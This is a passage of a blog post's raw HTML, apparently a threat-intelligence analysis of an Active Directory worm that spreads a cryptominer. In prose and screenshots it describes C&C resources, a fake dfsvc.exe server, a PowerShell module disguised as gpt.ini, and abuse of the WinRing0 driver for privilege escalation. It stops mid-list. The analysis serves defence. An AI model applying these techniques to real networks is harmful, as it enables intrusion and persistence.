        srcset=&quot;/website/static/f25998e4c90be895327c7c2f08e1b1ef/804b2/ADworm16.png 384w,
/website/static/f25998e4c90be895327c7c2f08e1b1ef/e5715/ADworm16.png 768w,
/website/static/f25998e4c90be895327c7c2f08e1b1ef/96658/ADworm16.png 881w&quot;
        sizes=&quot;(max-width: 881px) 100vw, 881px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;6.Test-net function, a multithreaded function to verify that the host is not already infected before a lateral movement &lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1148px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/5fd3319f8102b68522f663470d79769d/e6c84/ADworm17.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 24.479166666666668%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAIAAADKYVtkAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAvklEQVR42k2Ma3LFIAhGXUdH8Y2K5vpIbtruf2PFpj/KnPnmAKKgXEsqFV2JrqLnzGHDQuic1dZoY2CnfoCdZs8FHd+lfVE0lV/vS5u8xWD3fXCJ22CDM9yit9Fbb010WxihlJTyQyktgTFSadC7AFgMp1IKADj+YAf1uGjzM1NHOn0eicac15pzrmusu43LOQ+/xb/pR/4hei29xE7YcriPdL/yWdOq6X2Uq6V3i6vipMi8chglLsKzIq96iT/TvSsYcbLRqQAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;ADworm17&quot;
        title=&quot;&quot;
        src=&quot;/website/static/5fd3319f8102b68522f663470d79769d/e6c84/ADworm17.png&quot;
        srcset=&quot;/website/static/5fd3319f8102b68522f663470d79769d/804b2/ADworm17.png 384w,
/website/static/5fd3319f8102b68522f663470d79769d/e5715/ADworm17.png 768w,
/website/static/5fd3319f8102b68522f663470d79769d/e6c84/ADworm17.png 1148w&quot;
        sizes=&quot;(max-width: 1148px) 100vw, 1148px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Through lateral movements the attacker executes a command to &lt;em&gt;&lt;strong&gt;download or update&lt;/strong&gt;&lt;/em&gt; the malware. Domain controllers malware are installed or updated via the web resource &quot;/update&quot; of the internal or external C&amp;#x26;C.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1152px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/36d5c1b012bea0a8ab01f0f0f8ccd038/4ad3a/ADworm18.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 61.19791666666667%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAIAAADtbgqsAAAACXBIWXMAAA7EAAAOxAGVKw4bAAABKklEQVR42pWSDW7DIAyFc5AABhvb/KRpVGn3P9oM6bpNyzSNvBiwQvieYal6Ox6P+7EzCULy/2mLaN/3o5UumYmIc0ZiwhQh/L0YYsSYEkSbhBBgajYfZmYMTvkh/2W6CEsvuSs2pU2oqqhqZWyMnXET7EOWV4uaU8mWpL0QJVgkS9/uORMaQIQI8LGB/8b9YvHPnQc2Jdr3Nxa1X1FKk3Oyw6loY7Nm8cKzZft2ux9ba7XW8Rq1dWolNHwZPlhKmEX5UTAAyZqRU6LM9iBjMpmNNEDMyFjmnLtYbJ/0dmNm84wxOh9cAP+qNMAMv2KHJ3YtxXiLAZdmUduJLZ/Y7gK7alW2gjELK2fJpGy3xcARwNjTKO4ltp3PsLSaqXVdR3/qbP6Ud5c37B0RU18KWdS0ywAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;ADworm18&quot;
        title=&quot;&quot;
        src=&quot;/website/static/36d5c1b012bea0a8ab01f0f0f8ccd038/4ad3a/ADworm18.png&quot;
        srcset=&quot;/website/static/36d5c1b012bea0a8ab01f0f0f8ccd038/804b2/ADworm18.png 384w,
/website/static/36d5c1b012bea0a8ab01f0f0f8ccd038/e5715/ADworm18.png 768w,
/website/static/36d5c1b012bea0a8ab01f0f0f8ccd038/4ad3a/ADworm18.png 1152w&quot;
        sizes=&quot;(max-width: 1152px) 100vw, 1152px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;If the host is not a domain controller the web resource &quot; /sync&quot; is used instead.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1196px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/8d65216c3ca8ca84abf5314b01d6f4e0/51800/ADworm19.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 64.58333333333334%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAIAAAAmMtkJAAAACXBIWXMAAA7EAAAOxAGVKw4bAAABOklEQVR42pVS0XIDIQjMf7SngoiAd96l6UP+/8uKNnnLpdMdxmEG2YXVi7BZ66YWlokQHseIP3Ahqtt+W1vf1661co4lA0CaiI53zXFZ1n47vu/9et/3r9v1um6H6FooZxwc75q9DJgzoF+ewJjSEpxz+VyeOG0G0KbdyrGJCTFGwoQpIkSClDEj+gDRN/AtQgzDjxmj2WvdZJWymVyNNuVdiyeHUeNstSoXzskZCyZncQ8G0fTiUqjY8Cm5T5VACJmlFtICSmBlBlOruXMSys7YhYzRB3HlLANVKnMh3x/Ap3ET5sAjzb+mxxdux6jibySFq1NoZZcVLk6FT6Jw8mBj59Hsqr4Ajdtuv58zYKSAr1Rnsxe3tpk2UTVTp3HZh3KeynPsk08Sh/GfH8sbnH4S803V2qrh//gBbh5m10hD5r8AAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;ADworm19&quot;
        title=&quot;&quot;
        src=&quot;/website/static/8d65216c3ca8ca84abf5314b01d6f4e0/51800/ADworm19.png&quot;
        srcset=&quot;/website/static/8d65216c3ca8ca84abf5314b01d6f4e0/804b2/ADworm19.png 384w,
/website/static/8d65216c3ca8ca84abf5314b01d6f4e0/e5715/ADworm19.png 768w,
/website/static/8d65216c3ca8ca84abf5314b01d6f4e0/51800/ADworm19.png 1196w&quot;
        sizes=&quot;(max-width: 1196px) 100vw, 1196px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;The version of the malware is monitored via the web resource &quot; /banner&quot; by comparing the WMI filter name.&lt;/p&gt;
&lt;p&gt;In addition, these two functions are also dropped on the domain controller:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;1.testhser &lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 869px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/c4034cb7f4dac289fe92d56883feed72/2b2c6/ADworm20.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 59.375%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAIAAADtbgqsAAAACXBIWXMAAA7EAAAOxAGVKw4bAAABf0lEQVR42pVS7Y7bIBDMeyTma/laMGBsY+fukuak/ur7v1CX5CqdpapSR2AW2TPDjjlpl5WJMdpcEGMKeUm1AQDnXHxD3/EO9g0nJSFPe4hxqrnUMkYcY6QR8FkQSDlNxrrRgdPqQOaMex9SjrmEmFJOI6IzRjunMRAFQIM1+nI+Xy7n4QXGXuuJBKSCsW5jbS5mMtA4axejN3PCGk0XXD/CWMpU6RDoSVDSyaw1JxLR1i/3X8vbz1TvcX7k5TEv7fHjk8bH7b63bVvbMjcMo+Di1TdnvejOSsN0u+fr1m7TvJe21/beputeNnpe01qUYcpwoRmgUlYqJ6ng8ots1vfPtpWFPq0VKStPbYO1mpo3GgY29HyejuTb7UWP/UkGs6zbutUQMVDuIaD3xHLWIel4hx6N88EoC8e0SUwKiS7UXMu0Yt4dhQugFHUDuht3SJpKSHH8z3QBpOzXQHMQArjUw19w+ZoDO5DJNumgwQvtWe/t+P6f6M5/BDn7T/wGInNowc82CX0AAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;ADworm20&quot;
        title=&quot;&quot;
        src=&quot;/website/static/c4034cb7f4dac289fe92d56883feed72/2b2c6/ADworm20.png&quot;
        srcset=&quot;/website/static/c4034cb7f4dac289fe92d56883feed72/804b2/ADworm20.png 384w,
/website/static/c4034cb7f4dac289fe92d56883feed72/e5715/ADworm20.png 768w,
/website/static/c4034cb7f4dac289fe92d56883feed72/2b2c6/ADworm20.png 869w&quot;
        sizes=&quot;(max-width: 869px) 100vw, 869px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt; This function drops the internal C&amp;#x26;C server who will listen on port 49636 , the malware launches it and verifies that it works correctly. The rein script adds a rule on Windows firewall to allow server binding: &lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1191px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/3682ee300a166cfd7cd8e6ac15bc94e6/19a6b/ADworm21.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 20.052083333333336%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAIAAAABPYjBAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAj0lEQVR42m2OSw4CMQxD5yDQtGmb5tsZxP3vRhArEJEVPVte+LDrKXGmiI2FPDi2iLvEI8UWiAilNIAGpUIBgHdSW214uLMbmZHI4sUpU3Oz7SpMCeGuTCFkaYVU5Nw7K7qvQ9VFg1l670Q05xxjJIyOvdV8A8da6xNOoqxlJXFMPBpi6zPX3P9c+ba3H34Ba1MigYmhAVcAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;ADworm21&quot;
        title=&quot;&quot;
        src=&quot;/website/static/3682ee300a166cfd7cd8e6ac15bc94e6/19a6b/ADworm21.png&quot;
        srcset=&quot;/website/static/3682ee300a166cfd7cd8e6ac15bc94e6/804b2/ADworm21.png 384w,
/website/static/3682ee300a166cfd7cd8e6ac15bc94e6/e5715/ADworm21.png 768w,
/website/static/3682ee300a166cfd7cd8e6ac15bc94e6/19a6b/ADworm21.png 1191w&quot;
        sizes=&quot;(max-width: 1191px) 100vw, 1191px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;2.plant-ags: The function used by the domain controller to deploy the malware on targets through internal C&amp;#x26;C. To performe the deploy it exploits lateral movements techniques and a powershell module masked as gpt.ini downloaded through SMB. &lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1191px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/3682ee300a166cfd7cd8e6ac15bc94e6/19a6b/ADworm21.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 20.052083333333336%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAIAAAABPYjBAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAj0lEQVR42m2OSw4CMQxD5yDQtGmb5tsZxP3vRhArEJEVPVte+LDrKXGmiI2FPDi2iLvEI8UWiAilNIAGpUIBgHdSW214uLMbmZHI4sUpU3Oz7SpMCeGuTCFkaYVU5Nw7K7qvQ9VFg1l670Q05xxjJIyOvdV8A8da6xNOoqxlJXFMPBpi6zPX3P9c+ba3H34Ba1MigYmhAVcAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;ADworm21&quot;
        title=&quot;&quot;
        src=&quot;/website/static/3682ee300a166cfd7cd8e6ac15bc94e6/19a6b/ADworm21.png&quot;
        srcset=&quot;/website/static/3682ee300a166cfd7cd8e6ac15bc94e6/804b2/ADworm21.png 384w,
/website/static/3682ee300a166cfd7cd8e6ac15bc94e6/e5715/ADworm21.png 768w,
/website/static/3682ee300a166cfd7cd8e6ac15bc94e6/19a6b/ADworm21.png 1191w&quot;
        sizes=&quot;(max-width: 1191px) 100vw, 1191px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;e) The powershell script agen.ps1: &lt;a href=&quot;https://www.virustotal.com/gui/file/4911802093c93a378b80dc8ebced193f89a2c72501eb1cb3d62494a59c6590dd?nocache=1&quot;&gt;agen_decoded.ps1&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;f) Internal C&amp;#x26;C Malware on DC:&lt;/p&gt;
&lt;p&gt;A small and simple http server masked as a fake and unsigned  dfsvc.exe process ( a licit Windows Server process )&lt;/p&gt;
&lt;p&gt;The server is developed through &lt;a href=&quot;https://en.wikipedia.org/wiki/Mongoose_OS&quot;&gt;Mongoose OS&lt;/a&gt; &quot;an Internet of Things (IoT) Firmware Development Framework&quot; designed to be small and light.&lt;/p&gt;
&lt;p&gt;This server and the plants-ags function are command and control system, by matching the agent on virustotal the server is identified as a cryptominer but this is a false positive.&lt;/p&gt;
&lt;p&gt;During the installation phase the malware extract the agent.ps1 script from the server binary, easily viewable between the strings. By matching this code the antivirus incorrectly report the server as a cryptominer malware.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1158px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/e9056c984302775fd94e62c9e4b6630c/1132d/ADworm22.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 50%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAIAAAA7N+mxAAAACXBIWXMAAA7EAAAOxAGVKw4bAAABUUlEQVR42n1SSY7cMAz0Q9JaKK5abNlOo3MJkv+/KlQjOcwAE6JAC5LMqiK19T7n/aytH8ec+9hbG7USRIbkOYRv4evYUgjH/eP18/f1/TWfv/bjvud43fM67zGfYz9VTRCEqJTyeDw+/BxjAJTCncREq0PbUccU67kQFEopxX/xmRlZvaSXVSpCSCSUAuVQUnis+K9sZBGzKjSMurEpA+SckuPjzZhicDi/S3Exjo2I5mx7p+vQa9rz1Fl5Nz4rT6OzUle8uu/Q3tsxRlNWzIygCJuydEEjUFFT61wag6m7p0YwBIeWygVyBAA36Krym9bzZtoKErhPiOg3ckRIJUcuK/tBTgHX2JKW5JxrgVmKM+etADITMSMjeufQSXJMC8v5IoK0Yu28v9n9/20Yke7+Nvbe/X3U2mpzzT42ZBP2Zipq89KsFcVUhNVigvAe+B/vnVWaCNozuwAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;ADworm22&quot;
        title=&quot;&quot;
        src=&quot;/website/static/e9056c984302775fd94e62c9e4b6630c/1132d/ADworm22.png&quot;
        srcset=&quot;/website/static/e9056c984302775fd94e62c9e4b6630c/804b2/ADworm22.png 384w,
/website/static/e9056c984302775fd94e62c9e4b6630c/e5715/ADworm22.png 768w,
/website/static/e9056c984302775fd94e62c9e4b6630c/1132d/ADworm22.png 1158w&quot;
        sizes=&quot;(max-width: 1158px) 100vw, 1158px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1231px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/6738afc8f909c8674697d28d817db5b0/c56af/ADworm23.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 49.479166666666664%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAIAAAA7N+mxAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAA3ElEQVR42pVSW47DIAzkIuFhbAg2kDRpu+r9L7ZOaPdrtdoMI9vIGuQHJpUurdLcIibmMucMkaxi0nNyevsP7cdaw239et3357Y/7tttFWaIEIIPB4YN3gc36N7ByJhEvKy99ZkQAYDUESBGVE943BJBRB/QA/lAAZTpyCKa1nei5AM4Z51302+wg6PsMx4wte8zN6lVuiBFewWGRWtmnVmprK1cE2fKAeJZ1GQvwkjf+tKYcy7JXnzByLKxZB3pMVXdUQBdzH/FbXvNcsvclqVX4VJEu/j5Bn+LvwFOnk5yIHSCrQAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;ADworm23&quot;
        title=&quot;&quot;
        src=&quot;/website/static/6738afc8f909c8674697d28d817db5b0/c56af/ADworm23.png&quot;
        srcset=&quot;/website/static/6738afc8f909c8674697d28d817db5b0/804b2/ADworm23.png 384w,
/website/static/6738afc8f909c8674697d28d817db5b0/e5715/ADworm23.png 768w,
/website/static/6738afc8f909c8674697d28d817db5b0/c56af/ADworm23.png 1231w&quot;
        sizes=&quot;(max-width: 1231px) 100vw, 1231px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://www.virustotal.com/gui/file/586d6b581a868f71c903097a3b7046f61a0797cda090a36687767189483e2360/detection&quot;&gt;sample&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;g) A simple shellcode&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 812px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/ab4ec6e6169d1bb09d197abdc4895fdc/63ec5/ADworm24.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 92.70833333333334%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAATCAIAAAAf7rriAAAACXBIWXMAAA7EAAAOxAGVKw4bAAACHElEQVR42lWTC5KjMAxEc5qdyZefbWwTIAaymb3/hfbJcshulYrCRi21Ws2hHzbjl6oZjE+NmVsr0blH1xNJwqV8TLWZLlUkmbRbM7TucYjTqx+eVTu6uJmwgLFxdXElCZj1i0RYidY+pLSbGzO5YePmEMaXH551N4KxYTGSKqF4k8EurBSqzVh3k+kTMF4oIWDyAEtq+ABI0jzoALZCRMiTXDV3RmjsLGDGpoz1mSq0w+qkCuAls525BwPtaxWr9s60TEqtDI5b3Y5vqkmGz314tlm5zAjmj2sdb81dOgU+lc555s/AaxYZChBJ4AkUgic6+/vTxg0IyQImmm6SqfJIVslDFUnfasNOuRAqUK2CEZxVXtmKyC7bojzNUcRJqw39oM2qzzf/fbJfR5PB04syZDjJW+WFCPqylpthg86v7w7YHgXMMAUT/8d8bgRMt+PZ7fHuLIJJkpppp9C/wbKbPtHtdO3pT5VCO84/gMXMoodYMvtE156yirTF+dP5FoQmsrP8PqlguiqxZxk1rGVtYrXiUHULsPPVYxWUO/jxdxTak8uEVWcXZEnZIWnfP8fTpYc5tMnptHOcMm2XneyLJfVo/6lINg2xuvikX4pgdOaXVG6M6sL6FqmojVoum+R09bQ5XkTqr5Phf/4Z5j91dthuT53fZLX0if7QQTDU3Z1/0B0yfWZefnc1IMunqAquUuEwXZs42kx/AYO2/hnGD0U/AAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;ADworm24&quot;
        title=&quot;&quot;
        src=&quot;/website/static/ab4ec6e6169d1bb09d197abdc4895fdc/63ec5/ADworm24.png&quot;
        srcset=&quot;/website/static/ab4ec6e6169d1bb09d197abdc4895fdc/804b2/ADworm24.png 384w,
/website/static/ab4ec6e6169d1bb09d197abdc4895fdc/e5715/ADworm24.png 768w,
/website/static/ab4ec6e6169d1bb09d197abdc4895fdc/63ec5/ADworm24.png 812w&quot;
        sizes=&quot;(max-width: 812px) 100vw, 812px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://www.virustotal.com/gui/file/d28fa743f780ffa17f8479bd029165c39f449920192c6bfdbb8ff5ca9b4f1417/detection&quot;&gt;sample&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;h) A vulnerable driver&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 1257px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/website/static/0e33fb11b0bd08916098f4bc3fbdf7e3/54c3a/ADworm25.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 14.84375%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAIAAAAcOLh5AAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAbUlEQVR42n2OSQ7AIAhFPYhTjFbALhw6pfc/WJF23Rc2fP5LUMe+raV4740xWmsiQgBrrfnFCuq+rtF7XhaeGGOr9TwPyHkmk5lPUuIQ8b0kJoSgemvbGOxIIX2CVEAWcdgCQuS/SiEAYNM59wA/VRqtAs3WrwAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;ADworm25&quot;
        title=&quot;&quot;
        src=&quot;/website/static/0e33fb11b0bd08916098f4bc3fbdf7e3/54c3a/ADworm25.png&quot;
        srcset=&quot;/website/static/0e33fb11b0bd08916098f4bc3fbdf7e3/804b2/ADworm25.png 384w,
/website/static/0e33fb11b0bd08916098f4bc3fbdf7e3/e5715/ADworm25.png 768w,
/website/static/0e33fb11b0bd08916098f4bc3fbdf7e3/54c3a/ADworm25.png 1257w&quot;
        sizes=&quot;(max-width: 1257px) 100vw, 1257px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://www.virustotal.com/gui/file/11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5/details&quot;&gt;WinRing0x64.sys&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;This driver is dropped on all hosts except the domain controller. Even though it is used directly by XMRig, the driver is present in the most common &lt;a href=&quot;https://github.com/eclypsium/Screwed-Drivers/blob/master/DRIVERS.md&quot;&gt;vulnerable drivers blacklists&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This driver allows any user to perform a local privilege escalation and in generally some ring 0 activities:&lt;/p&gt;
&lt;p&gt;&quot;WinRing0 allows users to read and write to arbitrary physical memory, read and modify the model specific registers (MSRs), and read/write to IO ports on the host&quot; &lt;a href=&quot;https://posts.specterops.io/cve-2020-14979-local-privilege-escalation-in-evga-precisionx1-cf63c6b95896?gi=254ec1b09353&quot;&gt;2020-14979&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Not needing other privileges at these points of the killchain it is likely that the attacker will use it only for XMRig, however &lt;em&gt;&lt;strong&gt;leaving the driver there can expose the host to very serious security problems related to LPE and to the execution of ring 0 code&lt;/strong&gt;&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;For example:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Privilege escalation in user space&lt;/li&gt;
&lt;li&gt;Hinder the operation of security products&lt;/li&gt;
&lt;li&gt;Remove process protection from critical processes and add process protection to malware components&lt;/li&gt;
&lt;li&gt;Hide traces of malware via a &lt;a href=&quot;https://en.wikipedia.org/wiki/Protection_ring&quot;&gt;ring 0&lt;/a&gt; rootkit&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This technique is called &lt;em&gt;&lt;strong&gt;B&lt;/strong&gt;&lt;/em&gt;ring &lt;em&gt;&lt;strong&gt;Y&lt;/strong&gt;&lt;/em&gt;ou &lt;em&gt;&lt;strong&gt;O&lt;/strong&gt;&lt;/em&gt;wn &lt;em&gt;&lt;strong&gt;V&lt;/strong&gt;&lt;/em&gt;ulnerable &lt;em&gt;&lt;strong&gt;D&lt;/strong&gt;&lt;/em&gt;river (&lt;a href=&quot;https://gorkemkaradeniz.medium.com/defeating-runasppl-utilizing-vulnerable-drivers-to-read-lsass-with-mimikatz-28f4b50b1de5#:~:text=Well%2C%20then%2C%20there%20actually%20is,vulnerability%20to%20the%20target%20system.&quot;&gt;BYOvD&lt;/a&gt;) and allows you to bypass the following Microsoft security measures:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
